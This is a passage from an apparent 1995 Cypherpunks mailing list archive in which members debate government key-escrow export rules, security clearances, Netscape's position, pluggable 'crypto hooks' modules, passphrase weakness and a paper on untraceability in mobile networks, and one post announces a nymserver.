<199512060316.WAA10681@jekyll.piermont.com> Message-ID: <199512060406.UAA23330@infinity.c2.org> Yes, I sent email, but haven't received anything back from these people. > > > So, are the folks that broke the Microsoft password stupidity getting > "Hack Microsoft" T shirts? > > .pm > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From cp at proust.suba.com Tue Dec 5 20:18:13 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Tue, 5 Dec 95 20:18:13 PST Subject: NIST GAK export meeting, short version In-Reply-To: <64158.pfarrell@netcom.com> Message-ID: <199512060421.WAA06668@proust.suba.com> Thanks for the great summary, Pat. > His concern is not that smart people can have stronger crypto, but that > strong crypto will be easy and widely used. This is why the 4 horsemen arguments aren't very convincing. We often tend to view things in fairly black and white terms: either we have privacy or we don't. But even with strong crypto, most people won't have security because they'll screw it up. (Anyone who has ever been in charge of creating accounts for other people knows what kinds of passphrases people will pick.) And even the most concientous among us are still going to be vulnerable to physical attacks on our hardware or more exotic attacks like tempest. The real questions here are (a) how easy will it be to automate surveillance, and (b) how much is surveillance going to cost, not (c) is surveillance going to be possible at all? No matter what happens with the law, determined people will be able to protect their privacy fairly well. And no matter how strong the tools are, the government will be very often be able to penetrate the defenses by physically tampering with a machine, getting one correspondent to sell out another, or whatever. Without crypto, the price of surveillance is going to drop through the floor. It's a lot easier to filter email for suspicious key words than it is to analyse voice traffic on the telephone. But with crypto, the price of surveillance is going to go way up. Sticking with the status quo isn't an option. I'd feel a lot better if surveillance became more expensive. I don't have much faith in our legal protections against government surveillance. Sure, they can't introduce evidence into court if it was obtained with an illegal wiretap. But if they learn something interesting, they can trump up an "anonymous tipster" and get a court order. Who's watching the watchdogs to make sure they're following the law? The exclusionary rule isn't much comfort if it depends on the police admitting that they violated my rights. But how else would I know about an illegal government wiretap? How much surveillance is really taking place? Who knows. I do know that if it becomes 10 or 100 times more expensive than it is now, there will probably be a lot less of it. From dlv at bwalk.dm.com Tue Dec 5 20:19:21 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Tue, 5 Dec 95 20:19:21 PST Subject: No Privacy Right on "My" Desktop ? In-Reply-To: Message-ID: "James M. Cobb" writes: ... > Of course companies may try another tack: Oracle's "internet > terminal." > > As dlv at bwalk.dm.com pointed out in his 11 18 95 post, > > [I guess, they mean no permanent storage or software other > than the browser in ROM. No remembered state, no viruses > ... -DV] > > In "my" terminal. James, I do hope I haven't given you the impression that I *like* the proposed $500 "Internet appliance". These gizmos with no local permanent storage are antithetical to privacy. If you use it just to browse the Web, then your hotlist, history, et al would be kept at the ISP's. Most ISP's are greedy scum who wouldn't hesitate to sell this info to database maintainers. E.g., someone who accesses a Web page dealing with asthma might later receive unsolicited e-mail from a company selling asthma medicine, or even be turned down for employment because the medical insurance rates would jump based on his history of accessing an asthma-related Web page. Of course, this might happen when a regular PC is used to run a browser, but the "NC" would provide much more opportunity for such data collection, and little or no possibility to enhance the device with encryption / anonymity. Still, I predict that quite a few people will buy these things when they become available: those whose disposable income can accomodate a $500 NC, but not a $1000 PC; those unwilling to feed/care for a real PC, and only interested in browsing the net; whatever (let Oracle's marketing people identify their potential customers). No one knows if they'll sell enough to make money for their makers. I heard that currently one can buy add-ons to the Phillips CD-interactive and to the Nintendo/SGI game machine to turn them into Web browsers. I presume they sell. What I said was, someone selling an add-on product for the "NC" providing some degree of privacy (a PGP ROM on the PCMCIA port??) might make a quick buck. I'm not entrepreneurial enough to try it myself. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From futplex at pseudonym.com Tue Dec 5 20:26:05 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 5 Dec 95 20:26:05 PST Subject: NIST GAK export meeting, short version In-Reply-To: <64158.pfarrell@netcom.com> Message-ID: <199512060426.XAA20883@thor.cs.umass.edu> Pat Farrell writes: > I just got back from the NIST GAK export meeting. This is > a short writeup of a summary. (I should probably wait for a longer version, but what the hey...) [...] > (2) since the 64-bit limit was severly criticized at > the Sept meeting, why is it still needed if there is also escrow? [...] > and on the 64-bit issue, that the government is "not certain it will > work." he says they "want to see it implemented and want to see > how it works" because 64-bit encryption is very strong. If the escrow > doesn't work, they don't want a lot of softare to be in widespread use. This answer sounds rather silly to me. Do they seriously doubt that the escrow mechanism works (modulo MAB's observations about the LEAF), or expect us to believe that they do ? Clinton Brooks' comments cited later by Pat suggest a certain acceptance that enforcement will have its problems (e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't officially share that view. Is there another interpretation of "working" I'm missing here ? -Futplex "I'm from the D.O.E. and I just need to leave this here temporarily" (from a political cartoon entitled "The 3 Biggest Whoppers") From wb8foz at nrk.com Tue Dec 5 20:31:56 1995 From: wb8foz at nrk.com (David Lesher) Date: Tue, 5 Dec 95 20:31:56 PST Subject: NIST GAK export meeting, short version In-Reply-To: <64158.pfarrell@netcom.com> Message-ID: <199512060427.XAA09688@nrk.com> > > > I just got back from the NIST GAK export meeting. This is > a short writeup of a summary. I'll post a longer version later > this evening or early tomorrow morning. Pat did not mention the first thing I observed. Attendence was roughly 20% (yes, one fifth) of September. ISTM industry is tired of hearing the same words in a different order. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From nobody at REPLAY.COM Tue Dec 5 20:44:07 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 5 Dec 95 20:44:07 PST Subject: Secret Clearance Message-ID: <199512060445.FAA22949@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- At 9:00 PM 12/5/95, Pete Loshin wrote: >I'm definitely opposed to GAK, but the conspiracy theory approach to >considering what it means to employ people with SECRET clearance >may be getting a bit paranoid. In a discussion of governmental efforts to deny presumedly innocent citizens the assurance that they can conduct their affairs in privacy -- and to require that "trusted," "impartial" escrow agents employ someone who has been vetted according to undisclosed criteria, the best you can come up with is this "conspiracy theory" saw? Did *I* invent this stipulation? >>From working at an organization that did a lot of government work, >my understanding of the process of clearing employees is this: > >-certain tasks require knowledge or access that must be restricted >-you have to have a high degree of trust in the people doing those tasks >-people with money troubles, out-of-control addictions, skeletons in the > closet, and histories of "troubles" are prime targets for subversion >-doing a clearance check (in theory) eliminates the possibility that > these people will be blackmailed/bribed into revealing their secrets Therefore, *every* GAK escrow agent *must* employ someone with an arbitrary clearance level? >Not that this stuff always works in practice, considering that Aldrich >Ames And what protected him? Incompetence, cronyism, corruption, and ass-covering. Of course, any failures in GAK administration would be handled differently... >The point is, if you want to keep your organization's systems secure, >you need some mechanism to do so. Security clearance is one way; >banks and other financial institutions do other things (like finger prints, >background checks, etc.) I get the point. I *disagree* with it. >My big question is, do any of the companies providing Internet services, >or Internet software, or digital commerce services/software, employ >any of these security mechanisms on their employees? Comments or >(preferably) references to actual practices? On the *hardware* front, definitely -- if not by law then simply by practical need. Does the hardware in question *necessarily* apply to every citizen in America? Hieronymous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMUfVr3g0mNE55u1AQE2AwH+Ps6ux/T/jME+yz6NEr2hC02m2j1TalGr /hfzvIGytpAE3Ld6f0ltjz70RbSFb4mFX1oPbNnDVwDsPo5iSstEiw== =4PcI -----END PGP SIGNATURE----- From thad at hammerhead.com Tue Dec 5 21:59:51 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Tue, 5 Dec 95 21:59:51 PST Subject: NIST GAK export meeting, short version Message-ID: <199512060554.VAA05768@hammerhead.com> David Lesher said: > Attendence was roughly 20% (yes, one fifth) of September. > ISTM industry is tired of hearing the same words in a different order. I thought that this would happen, immediately on reading that there was going to be this meeting. From Pat and John Young's reports on the previous meeting, it was almost a revolt; almost everyone in attendence thought that the proposals were completely wrongheaded. Yet, it was announced that this meeting would be happening. Very quickly an new set of criteria were announced that made it clear that the input from the last meeting was completely, systematically, and with no apology whatsoever, ignored. All the intelligent complaints from intelligent people that cared and thought a lot about the issue could just have well not have been said. So, why go to the next meeting? Many people have apparently decided not to. Nothing can demoralize somebody more than making good points, telling arguments, that are then ignored. I would have thought at this meeting there would have been a majority of pro-GAK people, to affirm the mandate that was being presented. Apparently this did not happen, although I'm desparately waiting for more reports from this meeting as to exactly what did happen. It's not completely true that the efforts of the previous meeting had no effect, there was one: that the breakout meetings where the major shouting took place were eliminated from this meeting. I think that this was an error on the Govt's part, it worked so well the last time. I'm sure that by the next meeting, or the one after that, or if necessary the one after that, they will have finally come to the point where they can say that there was unanimous enthusiastic acceptance of the GAK criteria, so why not extend it to domestic use as well? thad who is deeply grateful to the East-Coast group for showing up and making noise -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-2244 From tcmay at got.net Tue Dec 5 22:40:37 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 22:40:37 PST Subject: NIST GAK export meeting, short version Message-ID: At 5:54 AM 12/6/95, Thaddeus J. Beier wrote: >I thought that this would happen, immediately on reading that there was >going to be this meeting. From Pat and John Young's reports on the previous >meeting, it was almost a revolt; almost everyone in attendence thought that ... Man, whatever government type thought up this idea of getting "industry input" is gonna have his head handed to him! Democracy really sucks at times. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Tue Dec 5 22:59:09 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 22:59:09 PST Subject: NIST GAK export meeting, sv Message-ID: At 3:35 AM 12/6/95, Anonymous wrote: >Tim May 12/5/95 6:25 PM: >>One "defensible" (and maybe even good) reason is because someone with >>government clearance can then be prosecuted for leaking what they know, >>whereas ordinary citizens are harder to prosecute for this. I doubt this is >>the main reason, but it makes a certain kind of sense. > > Nice point, though I too doubt that's the reason: if *every* agent >needed to be cleared, then this clearance stipulation would serve nicely, >but if only *one* at every escrow agency needs to be cleared... No, I didn't make that basic a logical blunder. What I was thinking, even if I didn't go into it, is that the "cleared" agent would be the one within the office who would actually handle the surveillance. But I do think the more basic reason is really that the intelligence agencies want a direct channel to "their" guy. I'm really pleased to hear about the 20% attendance. Nothing trivializes a program more than being ignored. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jimbell at pacifier.com Tue Dec 5 23:03:56 1995 From: jimbell at pacifier.com (jim bell) Date: Tue, 5 Dec 95 23:03:56 PST Subject: Solution for US/Foreign Software? Message-ID: Manufacturers of handheld ham radios have to make them for at least three markets: Japan, US, and Europe. Since these devices are usually based on the same LSI chip for control, customization is usually done by installing/not installing certain tiny surface-mount devices (diodes?) on the PC board, which tells the "boss MOS" which frequency band edges to work with, etc. Getting these radios to receive or transmit "out of band" is usually a simple matter of modiying these radios by adding/removing/moving these diodes to a different position. The instructions on how to do this custom operation are not included with the radio itself, but the information always seems to get out there, and you can buy books which show the mods for practically every such radio in existence. Okay, the problem as I see it is that USG doesn't want to approve encryption software for export that can use "excessively long" keys, yet Netscape (and others) want to be able to sell outside the country with full-feature encryption. I think I have a solution. 1. Write a program with limited encryption (40 bit?), with the encryption module in a file external to the main program. 2. Get export approval for this program. 3. Write a module which replaces the encryption file, increasing key size to whatever you REALLY wanted in the first place. (128-bit IDEA, 2000-bit PGP, etc.) 4. Ship that new module with the old software to US customers. Naturally, that new module will "leak," so anybody who buys the old program out of the country can convert to a fully-functional version by downloading it from a foreign bbs that just happens to have it. The module can be encrypted/signed by the manufacturer so everyone can be sure of its identity and genuineness. Better than nothing, I suppose. From tcmay at got.net Tue Dec 5 23:18:59 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 23:18:59 PST Subject: Solution for US/Foreign Software? Message-ID: jim bell proposes "crypto hooks": >1. Write a program with limited encryption (40 bit?), with the encryption >module in a file external to the main program. >2. Get export approval for this program. >3. Write a module which replaces the encryption file, increasing key size >to whatever you REALLY wanted in the first place. (128-bit IDEA, 2000-bit >PGP, etc.) >4. Ship that new module with the old software to US customers. >Naturally, that new module will "leak," so anybody who buys the old >program out of the country can convert to a fully-functional version by >downloading it from a foreign bbs that just happens to have it. The >module can be encrypted/signed by the manufacturer so everyone can be sure >of its identity and genuineness. > > >Better than nothing, I suppose. "Crypto hooks," basically the scheme you are proposing, were thought of by the authorities and are not a bypass of the crypto export laws. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jamesd at echeque.com Tue Dec 5 23:21:36 1995 From: jamesd at echeque.com (James A. Donald) Date: Tue, 5 Dec 95 23:21:36 PST Subject: Netscape gives in to key escrow Message-ID: <199512060722.XAA25437@blob.best.net> At 04:59 PM 12/4/95 -0600, Scott Brickner wrote: >Netscape has pretty clearly said that they don't like the idea of GAK, Actually netscape has not said that: Jeff has said that netscape *will* say that real soon now. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From blancw at accessone.com Tue Dec 5 23:23:12 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Tue, 5 Dec 95 23:23:12 PST Subject: Info on Netscape's key escrow position Message-ID: <9512060724.AA13235@pulm1.accessone.com> From: "James M. Cobb" Blanc, On 12 02 95 you pointed to: ...an underlying problem, which is of not having a sense of freedom to stand up to the Dark Side. You have put your finger on perhaps THE problem: Why did we cast aside our sense of freedom? How may we re-ignite the spirit of freedom? ......................................................... Yes, I think it's a pretty important element to ponder, this lack of the sense of freedom. I don't think that "we" all (especially on this list!) have cast it aside. I do notice that it seems to dissipitate the closer that one gets to govmt agencies (or vice versa). I have often heard people say "well, if it becomes a law, we'll have to uphold it". That seems to be the end of all effort towards reality, as though no further advancements toward truth were possible. It's a continual problem, fostered from being in the lower rungs of the pecking order of "authority" and then beginning to think that one rightly belongs there. Yet how often, especially lately, does technological progress make obsolete what yesterday was an "important" social/political issue requiring "offical intervention" from higher authorities to impose the lowest standards of functioning so that everyone could "get along". Sometimes the issue just goes away from atrophy or obsolescence, once certain talented individuals discover new, improved ways of getting things done. Of course, there's still always another social fear to overcome, and the more that inventors & scientists & techonologists push back the envelope of what is possible (especially in the field of electronics & communication), the closer they get to the gist of the problem with people's attitudes & behavior toward each other, and the closer also to the governing agencies which were created to deal with these concerns. Some things I know which inspire the sense of freedom to stand up to the Dark Side is to have definite knowledge, integrity, a personal vision of the future (an ideal), and some really useful tools (be they hardware or software). This list is intended to focus on the tools of cryptography in relation to privacy, James, and far-off digressions are discouraged because of the volume of mail which this would result in. So do try to focus on that, won't you, or you'll continue to hear from Perry, who works tirelessly to keep everyone in line. :>) .. Blanc From blancw at accessone.com Tue Dec 5 23:24:19 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Tue, 5 Dec 95 23:24:19 PST Subject: The "Future" Fallacy Message-ID: <9512060724.AA13231@pulm1.accessone.com> From: Duncan Frissell Bill Gates (like Mister Newt before him) committed what I call the Future Fallacy in "The Road Ahead." Page 106. "Soon any child old enough to use a computer will be able to transmit coded messages that no government on earth will find easy to decipher." ................................................... Billg is an optimist. What's wrong with this picture, Duncan? .. Blanc From tcmay at got.net Tue Dec 5 23:49:53 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 23:49:53 PST Subject: The "Future" Fallacy Message-ID: At 7:24 AM 12/6/95, blancw at accessone.com wrote: >From: Duncan Frissell > >Bill Gates (like Mister Newt before him) committed what I call the Future >Fallacy in "The Road Ahead." Page 106. > >"Soon any child old enough to use a computer will be able to transmit coded >messages that no government on earth will find easy to decipher." >................................................... > > >Billg is an optimist. > >What's wrong with this picture, Duncan? I found nothing wrong or incorrect with the quote Duncan attributed to Bill Gates (I haven't read Gates' book). I couldn't understand Duncan's koan, shrugged, and moved on. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jimbell at pacifier.com Wed Dec 6 00:25:26 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 6 Dec 95 00:25:26 PST Subject: Solution for US/Foreign Software? Message-ID: >>1. Write a program with limited encryption (40 bit?), with the encryption >>module in a file external to the main program. >>2. Get export approval for this program. >>3. Write a module which replaces the encryption file, increasing key size >>to whatever you REALLY wanted in the first place. (128-bit IDEA, 2000-bit >>PGP, etc.) >>4. Ship that new module with the old software to US customers. >>Naturally, that new module will "leak," so anybody who buys the old >>program out of the country can convert to a fully-functional version by >>downloading it from a foreign bbs that just happens to have it. The >>module can be encrypted/signed by the manufacturer so everyone can be sure >>of its identity and genuineness. >> >> >>Better than nothing, I suppose. > >"Crypto hooks," basically the scheme you are proposing, were thought of by >the authorities and are not a bypass of the crypto export laws. >--Tim May I'm not saying they are a "bypass" of the laws. Rather, I'm saying that if the goal is to: 1. Let companies like Netscape make foreign sales. 2. Still comply with the letter of the law. Then this would be an excellent way to achieve both those goals. (I accept as axiomatic that if the only exportable encryption is GAKked, they're not going to be viewed seriously as a product. A way around GAK would actually increase their profits.) BTW, the fact that they might be "thought of" by the authorities is not going to be enough to stop them. If the USG claims that it WILL approve GAK-ified software, it is unclear how they will decide if a given program qualifies. Since every program of length "N" is only an XOR away from every OTHER program of length "N", modifying or disabling this software is always possible. Remember, the reason (or, at least, one of them!) they put Clipper into a physical chip as opposed to releasing the algorithm was to prevent modifications that would subvert the algorithm. Their decision to allow software key-escrow presumably forces them to accept certain possibilities they otherwise wanted to avoid. If the USG tries to take the position that "any program which can be modified into another program that gets around GAK is prohibited from export," then they're going to have to stop allowing the export of pre-formatted floppy disks because they're likewise an XOR away from PGP. So we're back to square one: Does the USG intend to allow ANY programs to be exported? From feanor at anduin.gondolin.org Wed Dec 6 00:33:48 1995 From: feanor at anduin.gondolin.org (Bryan Strawser) Date: Wed, 6 Dec 95 00:33:48 PST Subject: No Subject Message-ID: <199512060641.BAA01380@anduin.gondolin.org> Gondolin Technologies is proud to announce a new nymserver for the online community at . This is the same service that is presently provided to the net at alpha.c2.org, utilizing software written by Matt Ghio . A nymserver allows any person with access to email to anonymous create an alias at through which they may send/receive email. This psuedonym is completely anonymous, and the identity of the user cannot be revealed as it is contained within a PGP encrypted reply block (unlike anon.penet.fi). For more information, send a message to and the help file with directions will be automatically sent to you. The PGP public key for the alias-creation address is below: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzC9I5YAAAEEAOvpLWjR1klfwpoQOtMA/qGsMtVtjtblpvNiMMkTxX3NVzib WnN1ZwhvLY3P/SqduLF2U4yzH6jVKiJJjzQG082K2MuW6wtl1GJYuw1/EPKDrBHj ksmvyXkX+DNOj/3cH6aKSlYALNClVF4yZkr3NTWE6Phr9LEREuSoorTnBJytAAUR tDFHb25kb2xpbiBBbHBoYSBOeW1zZXJ2ZXIgPGFsaWFzQG55bS5nb25kb2xpbi5v cmc+iQCVAwUQML6SAo6H3ZT4asdZAQE3uwP/aazOIAYzUBHs/oLhtCc4auE8jF6k wue/3JJq/ECpGskOYsggQAp98FPmLFzJfxgEREaC5vBt9Rac71IMwJ0r9PUp59bz n85bgem+lVxL0VmMR9sTsW9bYGkMGdSIvN8Q0gJHkCUXCMq2/Vp3dVXP4j2QCOFK RuuhlkCD2nqHCd2JAJUDBRAwvorfF139v5zDbCEBAXMxA/45lRrmTn4BpGt0qbiR Nr3XPh+ftQb3lQ0XDuwTDODgv/FjGiU2dM7v85tZAR8e2p7AeHoKvxFVJivP2/rR GqAHoOh52O4s6Zf1EhqsDAsFYthCjRNK8ASaUWLTljmx7kCQXiTWwPcJHnvHeXe5 nGnoXolVlZk7R5gFTAR7HkrNaIkAlQMFEDC9Jf370BoEO1CTGQEBuj4D/0amfilf Cli23RngrLM8FLYo7HQoL5vG6IO/d6hedeiQG+9KeSTnyeiWHXsAYjZ8TNQ5pPyt IUhsPxO9AkdYqW9oXqwRUfrkhhPS+R8eg1IN2kpdNsKiJvibhnuHZGOhmgc45yin eJ6kD/vuOg5gZXRIOCUd5usz1xyx0J7c50cj =5gm8 -----END PGP PUBLIC KEY BLOCK----- Please direct any complaints, comments, or concerns to . -Bryan Strawser, System/Network Administrator, Gondolin Technologies From rittle at comm.mot.com Wed Dec 6 00:54:33 1995 From: rittle at comm.mot.com (Loren James Rittle) Date: Wed, 6 Dec 95 00:54:33 PST Subject: Untraceability in Mobile Networks Message-ID: <9512060854.AA12541@supra.comm.mot.com> -----BEGIN PGP SIGNED MESSAGE----- FYI, at MobiCom '95, an ACM sponsored conference, an interesting paper entitled, _Untraceability in Mobile Networks_, was presented. The authors of the paper are Didier Samfat, Refik Molva and N. Asokan. For order info contact: acmhelp at acm.org ACM ISBN: 0-89791-814-2 ACM Order Number: 533952 As per the ACM rule, ``Abstracting with credit is permitted,'' I abstract ideas from the paper below. - From the paper's abstract: ``User mobility is a feature that raises many new security-related issues and concerns. One of them is the disclosure of a mobile user's real identity during the authentication process, or other procedures specific to mobile networks. Such disclosure allows an unauthorized third-party to track the mobile user's movements and current whereabouts. Depending on the context, access to any information related to a mobile user's location without his consent can be a serious violation of his privacy.'' The paper, along with other ideas of interest to the Cypherpunk, presents a classification system for arguing about the tradeoff between user authentication, user privacy (with respect to various entities in the network), user billing and user conveniences (such as, ``can others find the mobile user through his home agent?'') in mobile networks. The rest of the paper uses the classification scheme, which really is just a convenience way of mapping all the players in the network to the information they are allowed to ever know about a user that has an expectation of a certain level of privacy. The classification scheme models the following useful information regarding users: the full identity of the user f, the identity of the user's home domain h, and the identity of the user's current remote domain r. The classification scheme has the following players: User U, Home Domain/Authority H, Remote Domain/Authority R, Legitimate Network Entities L, and Eavesdroppers E. They assume U always knows everything about itself, so they ignore it from the discussion. Notice that they model no `GAK (Government Access to Key)' or, in this case, `GAI (Government Access to Identity)' agent. After laying the groundwork, the authors then set about to discuss the matrix of known information, according to their classification system, for various interesting cases: C1: Hiding User Identity from Eavesdroppers; C2: Hiding User Identity from Foreign Authorities; C3: Hiding Relationship Between the User and Authorities; C4: Hiding the Identity of the Home Authority from Foreign Authorities; and C5: Hiding User Behavior from Home Authority. The cases offer more privacy from C1 to C5. See the paper for the exact mapping of C[1-5] to the knowledge matrix involving f, h, r verses H, R, L, E. The authors, quite correctly, label C5 as in direct contrast to the intent of a ``big brother'' principle since ``no entity [other than the user] has any information about the user.'' Attaining C5 in a system would really be the ultimate in user location/action privacy. The authors do not discuss the issue, but it appears to be an open question whether, in light of a conspiracy involving authorities, whether or not C5 could actually be attained for a mobile user in a network. Note: At the other end of the privacy spectrum is the unlist C0 case. This correspond exactly to the classic cellular phone system in that nothing is hidden from eavesdroppers. Every relationship box on the knowledge matrix for case C0 is set to true. Next, the authors address how the levels of privacy affect and are affected by other, non-security related, areas of system requirements. For example, to make the highest levels of privacy work with cross-authority guaranteed billing, some form of anonymous, non-repudiable digital cash might be required. The paper goes on to discuss how GSM, for both voice and packet data users, and CDPD fail to even completely cover the simplist of privacy cases, C1! The authors construct a protocol that provides privacy levels C1 and C2, then enhance the basic algorithm to provide a hybrid privacy level somewhere between C4 and C5 (they do not solve all the privacy problems present when the home and foreign authorities are involved in a conspiracy --- they do, however, worry about foreign authorities involved in a local conspiracy amongst themselves). Finally, the authors give a proof of correctness for the basic algorithm, an evaluation of its performance and compare their design to other possible designs. In sum, this paper is a must read for all Cypherpunk's interested in the topic of untraceability and user identification privacy in mobile networks. To me, the paper appears to extend the state of the art in several directions since it applies Chaum's, and other's, ideas to mobile networks, where some tradeoffs are different from wired, stable networks and some problems are entirely new. As a final aside, none of the authors could be present to give the talk related to the paper, so the advisor of one of the students, Jay Black of the University of Waterloo, gave the talk. He mentioned that he did to not understand why this area of research was important. Apparently, he has never heard the Cypherpunk's privacy message. However, he was quite a good sport about presenting the paper. Later, in the question period --- a guy, later outed as with the U. S. government --- raised the same issue in a more hostile tone. All I can say to the unknown G-Man, ``Are you totally clueless? This is a country that was founded upon the principles of anonymous speech and one's right to privacy. It is about time that the people restore these lost freedoms through technology alone, if possible, or on the political scene, if required.'' Regards, Loren - -- Loren J. Rittle (rittle at comm.mot.com) PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5 Systems Technology Research (IL02/2240) FP1024:6810D8AB3029874DD7065BC52067EAFD Motorola, Inc. FP2048:FDC0292446937F2A240BC07D42763672 (708) 576-7794 Call for verification of fingerprints. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMVZ+/8de8m5izJJAQFL9AQAhwzqlJK4fnsnCs09XO7Mnhfej1z+eHrQ ALhAVNSYphH1qvLAM4veRr+Af+XoP0QO7s6GXu+IHlR5b0r8Qy9qKw5XeIeGra4d wuqrVngKAd6Pm0G2Gdj6+4ERoNJL9xwIvfswUyMNAai8K+rnqBE9F/yTTRn363T+ dT9CkMq+Wqs= =MP9H -----END PGP SIGNATURE----- From cp at proust.suba.com Wed Dec 6 01:15:34 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Wed, 6 Dec 95 01:15:34 PST Subject: The "Future" Fallacy In-Reply-To: Message-ID: <199512060918.DAA06957@proust.suba.com> Duncan Frissell quotes Bill Gates: >"Soon any child old enough to use a computer will be able to transmit coded >messages that no government on earth will find easy to decipher." blancw at accessone.com responds: >Billg is an optimist. > >What's wrong with this picture, Duncan? Then Tim May says: > I found nothing wrong or incorrect with the quote Duncan attributed to Bill > Gates (I haven't read Gates' book). > > I couldn't understand Duncan's koan, shrugged, and moved on. I don't know what blancw was getting at, but I'll take up his side of the argument. Can good security really be automated so well that people will have it without thinking about it? I create accounts at an ISP, and 90% of the people who walk in the door pick terrible passpwords, even after listening to a little speech about what makes a good one. I'd be willing to bet that more than half the people using PGP have passphrases that would fall quickly to a dictionary attack. The child in billg's example might have a giant key sitting on the hard drive, but it's either going to be sitting there in the clear or protected by a passphrase. Will the child pick a good passphrase? One of the most important arguments we can make against government control of crypto is that the claims of impenetrability are being oversold on both sides of the debate. If the NSA wanted my PGP key badly, they'd have it and I wouldn't know it. I can think of lots of ways they could get it, and I'm not nearly as clever as they are. Good algorithms and protocols aren't enough: you need good human discipline. The best software in the world won't help me if my passphrase is "alex1" -- and that's what 25% of the people named Alex will set it to, providing that you impose the restriction that passphrases must have a non-alphabetic character. There's an enormous difference between the amount of care that people in the intelligence business and casual crypto users take with keys. Are the spooks wasting time and energy? I don't think so -- that's what it takes to minimize your risks. Do I do it? No. If someone swapped my pgp binary, I'd never know it. Crypto won't protect us absolutely from surveillance, but it will do a very good job of protecting us from automated surveillance. Right now, phones are wiretapped for next to nothing. If I have a friend who sells drugs and I speak with him on the phone frequently, I can get on the list. If they hear something on my phone that keeps them interested, another friend of mine can get put on the list as well. It spreads like a viral infection. That's the sort of thing crypto will put a stop to. If they want my key, they'll be able to grab it. But it won't be practical for them to grab the keys of the ten people I correspond with most just because they coreespond with me. From unicorn at schloss.li Wed Dec 6 01:29:24 1995 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 6 Dec 95 01:29:24 PST Subject: The "Future" Fallacy In-Reply-To: Message-ID: On Wed, 6 Dec 1995, Timothy C. May wrote: > At 7:24 AM 12/6/95, blancw at accessone.com wrote: > >From: Duncan Frissell > > > >Bill Gates (like Mister Newt before him) committed what I call the Future > >Fallacy in "The Road Ahead." Page 106. > > > >"Soon any child old enough to use a computer will be able to transmit coded > >messages that no government on earth will find easy to decipher." > >................................................... > > > > > >Billg is an optimist. > > > >What's wrong with this picture, Duncan? > > I found nothing wrong or incorrect with the quote Duncan attributed to Bill > Gates (I haven't read Gates' book). > > I couldn't understand Duncan's koan, shrugged, and moved on. > I think Duncan was mad at the 'soon.' Why not today? > --Tim May > > Views here are not the views of my Internet Service Provider or Government. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at netscape.com Wed Dec 6 03:01:18 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 6 Dec 95 03:01:18 PST Subject: Netscape gives in to key escrow In-Reply-To: <199512060722.XAA25437@blob.best.net> Message-ID: <30C56CF3.2947@netscape.com> James A. Donald wrote: > > At 04:59 PM 12/4/95 -0600, Scott Brickner 